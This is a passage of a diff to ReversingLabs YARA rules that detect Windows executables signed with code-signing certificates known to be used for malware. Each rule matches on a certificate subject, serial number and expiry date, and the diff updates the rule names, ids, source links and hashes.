-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funbit" and pe.signatures [ i ] . serial == "7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and ( pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures [ i ] . serial == "ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" ) and 1614643200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e"
+		id = "251212a5-95ce-5d9f-aec0-e6d3dd099349"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14112-L14128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7070-L7086"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18247,21 +42912,21 @@ rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELECTRONIC GROUP" and pe.signatures [ i ] . serial == "09:8a:57" and 1032855179 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3"
+		id = "61b67e68-9e15-5848-b12a-437a0ad8399e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14130-L14146"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7088-L7104"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18271,21 +42936,21 @@ rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Joerm.com" and pe.signatures [ i ] . serial == "53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1eeff730-c2ce-5689-a8cb-455618738a82"
+		id = "a1efbce8-3cca-5e07-a652-d67007c72a18"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14148-L14166"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7106-L7122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18295,21 +42960,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:ed:9c:ae:b7:91:1b:31:bd" or pe.signatures [ i ] . serial == "ed:9c:ae:b7:91:1b:31:bd" ) and 1506001740 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures [ i ] . serial == "0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab"
+		id = "76999ae0-966e-5c52-8e00-a3af8afd8fae"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14168-L14184"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7124-L7140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18319,21 +42984,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR AND CILLA LTD" and pe.signatures [ i ] . serial == "0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0e844bef-1cfe-5eba-af4d-d8477e55470c"
+		id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14186-L14202"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7142-L7160"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18343,21 +43008,21 @@ rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures [ i ] . serial == "2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EKO-KHIM TOV" and ( pe.signatures [ i ] . serial == "00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures [ i ] . serial == "f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" ) and 1598989763 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c"
+		id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14204-L14220"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7162-L7180"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18367,21 +43032,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SG Internet" and pe.signatures [ i ] . serial == "6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5 th Dimension LTD Oy" and ( pe.signatures [ i ] . serial == "00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures [ i ] . serial == "f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" ) and 1618531200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "60a3e63c-4f44-5c75-9928-69859d77af3e"
+		id = "25df791f-1128-51f9-90da-9977262d00c7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14222-L14240"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7182-L7200"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18391,21 +43056,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures [ i ] . serial == "ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" ) and 1527811200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEVELOP - Residence s. r. o." and ( pe.signatures [ i ] . serial == "00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures [ i ] . serial == "e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" ) and 1618358400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9"
+		id = "7c685bb7-3201-5ffc-856b-657d824595ab"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14242-L14258"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7202-L7218"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18415,21 +43080,21 @@ rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9"
+		id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14260-L14276"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7220-L7238"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18439,21 +43104,21 @@ rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and ( pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures [ i ] . serial == "d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" ) and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b78e3bc2-5b65-507a-9183-148f97baa3e8"
+		id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14278-L14294"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7240-L7258"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18463,21 +43128,21 @@ rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and ( pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures [ i ] . serial == "80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" ) and 1615507200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ad650b2-45ea-5324-b8dc-b48094ae2376"
+		id = "e45d66b0-58ae-5054-b0a7-47a001daac7a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14296-L14312"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7260-L7276"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18487,21 +43152,21 @@ rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dong Qian" and pe.signatures [ i ] . serial == "3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "be5e6f35-6177-50bb-82ea-55628acda4c2"
+		id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14314-L14330"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7278-L7294"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18511,21 +43176,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc"
+		id = "602b8c18-3dad-55b9-bb47-3f9835a049ac"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14332-L14348"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7296-L7312"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
